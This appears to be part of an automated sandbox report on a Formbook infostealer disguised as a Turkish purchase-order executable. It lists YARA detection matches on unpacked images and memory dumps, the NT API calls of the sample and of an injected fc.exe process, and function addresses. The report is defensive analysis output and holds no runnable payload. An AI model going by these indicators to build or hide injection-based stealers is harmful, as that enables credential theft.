Source: fc.exe, 00000009.00000003.2340849725.00000000075B8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

E-Banking Fraud

barindex
Source: Yara match File source: 3.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.4151312291.0000000000390000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.4152828319.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2136117245.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2137792677.0000000001C10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.4154513255.00000000050C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.4152767044.0000000000B50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2137923561.0000000003A50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.4152697754.0000000004530000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary

barindex
Source: 3.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 3.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000009.00000002.4151312291.0000000000390000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000009.00000002.4152828319.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.2136117245.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.2137792677.0000000001C10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000B.00000002.4154513255.00000000050C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000009.00000002.4152767044.0000000000B50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.2137923561.0000000003A50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.4152697754.0000000004530000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.2cdc3ac.0.raw.unpack, -Module-.cs Large array initialization: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E: array initializer size 3088
Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.7160000.4.raw.unpack, -Module-.cs Large array initialization: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E: array initializer size 3088
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0042B2E3 NtClose, 3_2_0042B2E3
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01932B60 NtClose,LdrInitializeThunk, 3_2_01932B60
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01932DF0 NtQuerySystemInformation,LdrInitializeThunk, 3_2_01932DF0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01932C70 NtFreeVirtualMemory,LdrInitializeThunk, 3_2_01932C70
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019335C0 NtCreateMutant,LdrInitializeThunk, 3_2_019335C0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01934340 NtSetContextThread, 3_2_01934340
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01934650 NtSuspendThread, 3_2_01934650
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01932B80 NtQueryInformationFile, 3_2_01932B80
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01932BA0 NtEnumerateValueKey, 3_2_01932BA0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01932BF0 NtAllocateVirtualMemory, 3_2_01932BF0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01932BE0 NtQueryValueKey, 3_2_01932BE0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01932AB0 NtWaitForSingleObject, 3_2_01932AB0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01932AD0 NtReadFile, 3_2_01932AD0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01932AF0 NtWriteFile, 3_2_01932AF0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01932DB0 NtEnumerateKey, 3_2_01932DB0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01932DD0 NtDelayExecution, 3_2_01932DD0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01932D10 NtMapViewOfSection, 3_2_01932D10
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01932D00 NtSetInformationFile, 3_2_01932D00
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01932D30 NtUnmapViewOfSection, 3_2_01932D30
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01932CA0 NtQueryInformationToken, 3_2_01932CA0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01932CC0 NtQueryVirtualMemory, 3_2_01932CC0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01932CF0 NtOpenProcess, 3_2_01932CF0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01932C00 NtQueryInformationProcess, 3_2_01932C00
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01932C60 NtCreateKey, 3_2_01932C60
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01932F90 NtProtectVirtualMemory, 3_2_01932F90
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01932FB0 NtResumeThread, 3_2_01932FB0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01932FA0 NtQuerySection, 3_2_01932FA0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01932FE0 NtCreateFile, 3_2_01932FE0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01932F30 NtCreateSection, 3_2_01932F30
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01932F60 NtCreateProcessEx, 3_2_01932F60
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01932E80 NtReadVirtualMemory, 3_2_01932E80
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01932EA0 NtAdjustPrivilegesToken, 3_2_01932EA0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01932EE0 NtQueueApcThread, 3_2_01932EE0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01932E30 NtWriteVirtualMemory, 3_2_01932E30
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01933090 NtSetValueKey, 3_2_01933090
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01933010 NtOpenDirectoryObject, 3_2_01933010
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019339B0 NtGetContextThread, 3_2_019339B0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01933D10 NtOpenProcessToken, 3_2_01933D10
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01933D70 NtOpenThread, 3_2_01933D70
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02D44340 NtSetContextThread,LdrInitializeThunk, 9_2_02D44340
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02D44650 NtSuspendThread,LdrInitializeThunk, 9_2_02D44650
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02D42AD0 NtReadFile,LdrInitializeThunk, 9_2_02D42AD0
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02D42AF0 NtWriteFile,LdrInitializeThunk, 9_2_02D42AF0
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02D42BF0 NtAllocateVirtualMemory,LdrInitializeThunk, 9_2_02D42BF0
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02D42BE0 NtQueryValueKey,LdrInitializeThunk, 9_2_02D42BE0
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02D42BA0 NtEnumerateValueKey,LdrInitializeThunk, 9_2_02D42BA0
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02D42B60 NtClose,LdrInitializeThunk, 9_2_02D42B60
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02D42EE0 NtQueueApcThread,LdrInitializeThunk, 9_2_02D42EE0
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02D42E80 NtReadVirtualMemory,LdrInitializeThunk, 9_2_02D42E80
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02D42FE0 NtCreateFile,LdrInitializeThunk, 9_2_02D42FE0
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02D42FB0 NtResumeThread,LdrInitializeThunk, 9_2_02D42FB0
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02D42F30 NtCreateSection,LdrInitializeThunk, 9_2_02D42F30
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02D42CA0 NtQueryInformationToken,LdrInitializeThunk, 9_2_02D42CA0
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02D42C70 NtFreeVirtualMemory,LdrInitializeThunk, 9_2_02D42C70
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02D42C60 NtCreateKey,LdrInitializeThunk, 9_2_02D42C60
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02D42DD0 NtDelayExecution,LdrInitializeThunk, 9_2_02D42DD0
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02D42DF0 NtQuerySystemInformation,LdrInitializeThunk, 9_2_02D42DF0
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02D42D10 NtMapViewOfSection,LdrInitializeThunk, 9_2_02D42D10
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02D42D30 NtUnmapViewOfSection,LdrInitializeThunk, 9_2_02D42D30
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02D435C0 NtCreateMutant,LdrInitializeThunk, 9_2_02D435C0
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02D439B0 NtGetContextThread,LdrInitializeThunk, 9_2_02D439B0
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02D42AB0 NtWaitForSingleObject, 9_2_02D42AB0
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02D42B80 NtQueryInformationFile, 9_2_02D42B80
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02D42EA0 NtAdjustPrivilegesToken, 9_2_02D42EA0
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02D42E30 NtWriteVirtualMemory, 9_2_02D42E30
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02D42F90 NtProtectVirtualMemory, 9_2_02D42F90
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02D42FA0 NtQuerySection, 9_2_02D42FA0
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02D42F60 NtCreateProcessEx, 9_2_02D42F60
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02D42CC0 NtQueryVirtualMemory, 9_2_02D42CC0
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02D42CF0 NtOpenProcess, 9_2_02D42CF0
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02D42C00 NtQueryInformationProcess, 9_2_02D42C00
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02D42DB0 NtEnumerateKey, 9_2_02D42DB0
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02D42D00 NtSetInformationFile, 9_2_02D42D00
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02D43090 NtSetValueKey, 9_2_02D43090
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02D43010 NtOpenDirectoryObject, 9_2_02D43010
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02D43D70 NtOpenThread, 9_2_02D43D70
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02D43D10 NtOpenProcessToken, 9_2_02D43D10
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_003B80C0 NtDeleteFile, 9_2_003B80C0
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_003B8160 NtClose, 9_2_003B8160
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_003B82B0 NtAllocateVirtualMemory, 9_2_003B82B0
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_003B7E70 NtCreateFile, 9_2_003B7E70
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_003B7FD0 NtReadFile, 9_2_003B7FD0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 0_2_012DD364 0_2_012DD364
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 0_2_02C23F50 0_2_02C23F50
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 0_2_02C26278 0_2_02C26278
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 0_2_02C271A0 0_2_02C271A0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 0_2_02C21710 0_2_02C21710
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 0_2_02C21B48 0_2_02C21B48
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 0_2_02C21B38 0_2_02C21B38
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 0_2_02C23EC1 0_2_02C23EC1
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 0_2_02C23F19 0_2_02C23F19
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 0_2_07188788 0_2_07188788
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 0_2_07181060 0_2_07181060
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 0_2_07187F28 0_2_07187F28
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 0_2_07183D50 0_2_07183D50
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 0_2_0718F778 0_2_0718F778
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 0_2_07188779 0_2_07188779
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 0_2_0718877B 0_2_0718877B
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 0_2_07186438 0_2_07186438
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 0_2_07182450 0_2_07182450
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 0_2_07182460 0_2_07182460
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 0_2_0718F340 0_2_0718F340
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 0_2_071882B1 0_2_071882B1
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 0_2_07187F18 0_2_07187F18
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 0_2_0718EF08 0_2_0718EF08
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 0_2_07180F89 0_2_07180F89
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 0_2_07183EE3 0_2_07183EE3
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 0_2_07183CC8 0_2_07183CC8
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 0_2_07181918 0_2_07181918
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 0_2_0718190B 0_2_0718190B
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 0_2_07187978 0_2_07187978
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 0_2_07187967 0_2_07187967
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_00401150 3_2_00401150
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_00401C16 3_2_00401C16
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0040FD4A 3_2_0040FD4A
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0040FD53 3_2_0040FD53
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_00402EF6 3_2_00402EF6
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_004166FE 3_2_004166FE
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0040FF73 3_2_0040FF73
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_00402F00 3_2_00402F00
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_00416703 3_2_00416703
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0042D713 3_2_0042D713
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0040DFE9 3_2_0040DFE9
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0040DFF3 3_2_0040DFF3
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019C01AA 3_2_019C01AA
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019B41A2 3_2_019B41A2
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019B81CC 3_2_019B81CC
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0199A118 3_2_0199A118
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018F0100 3_2_018F0100
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01988158 3_2_01988158
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01992000 3_2_01992000
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0190E3F0 3_2_0190E3F0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019C03E6 3_2_019C03E6
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019BA352 3_2_019BA352
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019802C0 3_2_019802C0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019A0274 3_2_019A0274
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019C0591 3_2_019C0591
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01900535 3_2_01900535
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019AE4F6 3_2_019AE4F6
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019A4420 3_2_019A4420
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019B2446 3_2_019B2446
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018FC7C0 3_2_018FC7C0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01924750 3_2_01924750
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01900770 3_2_01900770
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0191C6E0 3_2_0191C6E0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019029A0 3_2_019029A0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019CA9A6 3_2_019CA9A6
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01916962 3_2_01916962
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018E68B8 3_2_018E68B8
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0192E8F0 3_2_0192E8F0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0190A840 3_2_0190A840
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01902840 3_2_01902840
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019B6BD7 3_2_019B6BD7
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019BAB40 3_2_019BAB40
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018FEA80 3_2_018FEA80
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01918DBF 3_2_01918DBF
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018FADE0 3_2_018FADE0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0199CD1F 3_2_0199CD1F
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0190AD00 3_2_0190AD00
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019A0CB5 3_2_019A0CB5
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018F0CF2 3_2_018F0CF2
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01900C00 3_2_01900C00
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0197EFA0 3_2_0197EFA0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018F2FC8 3_2_018F2FC8
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01920F30 3_2_01920F30
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019A2F30 3_2_019A2F30
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01942F28 3_2_01942F28
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01974F40 3_2_01974F40
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01912E90 3_2_01912E90
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019BCE93 3_2_019BCE93
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019BEEDB 3_2_019BEEDB
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019BEE26 3_2_019BEE26
